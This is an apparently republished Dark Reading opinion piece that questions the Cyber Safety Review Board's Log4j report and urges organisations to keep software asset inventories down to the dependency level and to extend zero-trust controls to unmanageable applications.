Security
Headlines
HeadlinesLatestCVEs

Headline

Don't Take the Cyber Safety Review Board's Log4j Report at Face Value

Given the lack of reporting requirements, the findings are more like assumptions. Here’s what organizations can do to minimize exposure.

DARKReading
#vulnerability#apache#redis#log4j#auth#zero_day

The most significant finding in the Cyber Safety Review Board’s voluminous analysis of the Log4j vulnerability is what it didn’t observe.

The board is “not aware of any significant Log4j-based attacks on critical infrastructure systems.” Also, “exploitation of Log4j occurred at lower levels than many experts predicted, given the severity of the vulnerability.” That’s remarkable since Log4j is one of the most severe vulnerabilities of the past decade.

Given how widely the library is used, it’s difficult to accept that a vast vulnerability like this — identified as “endemic” — didn’t cause any real damage to critical infrastructures. The report saying there weren’t any significant incidents is no reason to drop our guard, however. In fact, we need to be more vigilant than ever.

The report acknowledges that unlike, say, government agencies reviewing transportation disasters, there was “no crash site or damaged vehicle to inspect, no stress tests to perform on failed equipment, and no wiring diagrams to review.” And since critical infrastructure owners and operators were not yet required to report breaches to the federal government, there’s a significant blind spot. The findings in the report are just assumptions, and organizations should not feel comforted by them.

Log4j remains deeply embedded in systems everywhere — it’s one of the few pieces of software that popular applications such as Apache Struts, ElasticSearch, Redis, Kafka, and others have in common. We’re also told that during the board’s review, community stakeholders identified “new compromises, new threat actors, and new learnings.”

Some of this represents the democratization of software programming. This is a good thing — but we need to be aware that as long as we have software, we’ll have software vulnerabilities.

Knowing Every Link in the Chain

Guarding against weak links in the software supply chain requires adequate knowledge of every link in the chain — an elusive goal. Most organizations have terrible asset management practices — and it’s impossible to secure technologies in the infrastructure when no one is sure what those technologies are, where they’re stored, and how they’re used.

There are always new tools and capabilities coming down the pike, and with cloud applications, it’s even worse. For homegrown applications in the cloud, developers typically don’t see it as their responsibility to track which software components are in the mix. Their focus is on output, not sourcing. And with software-as-a-service (SaaS) applications, there’s a near-total dependence on the third-party vendor doing the right thing.

Even without consequences we can point to, Log4j offers further proof that software supply chain security is fundamentally broken.

What to Do Next

So what can we do to fix it? The CSRB report serves up recommendations rich with anecdotes. They’re well-meaning but too opaque for companies to implement in real-world settings. For example, we’re told that “organizations should be prepared to address Log4j vulnerabilities for years to come.” But how?

There are steps organizations can take. Again, there are no guarantees — foolproof protection is impossible. But the dangers can be contained and minimized.

First, organizations need greater awareness of all technologies in use; asset management is useless without up-to-date asset inventory. This is an ongoing priority, and it requires developer buy-in. Almost every business uses open source software, so asset inventory must extend down to the dependency level. This isn’t sexy, but it may be one of the most essential activities to carry out effectively.

Developers and their software are one thing, yet in every enterprise business users now deploy the apps they believe are best for getting the job done. Employers are understandably concerned about security and compliance, but heavy-handed enforcement (i.e., attempting to block access) represents a losing proposition for everyone. Employee application choice and enterprise security are not mutually exclusive — and with technologies now available, they go hand-in-hand.

In the past we’d call this unsanctioned use of applications shadow IT, but now there’s a better term: unmanageable applications. They’re very common and easy to spot because they don’t support identity and security standards. IT-authorized applications are hard enough to police; unmanageable applications are an even bigger challenge.

Second, we need to move toward zero-trust architecture. This concept is getting a lot of buzz, but there are challenges in deploying zero trust for unmanageable applications. Implementing zero trust requires multiple layers of controls. Trying to apply zero-trust principles to unmanageable applications that don’t support industry standards like SAML (for authentication) and SCIM (for adding and removing users) is extremely difficult. Unmanageable applications cannot be added to a zero-trust protected surface since they don’t support identity standards. A fundamental zero-trust principle defines who can access a data, application, asset, or service (DAAS) element. Organizations must ensure they include all business apps, including the unmanageable ones, in their zero-trust strategy, not only those that support standards.

We haven’t dodged a bullet with Log4j, and there are more zero-days on the way. The CSRB report should serve as a wake-up call for organizations worldwide to dig deeper into their software supply chain for all applications. Physical supply chains have long had this attention; software deserves the same scrutiny.

DARKReading: Latest News

WhatsApp: NSO Group Operates Pegasus Spyware for Customers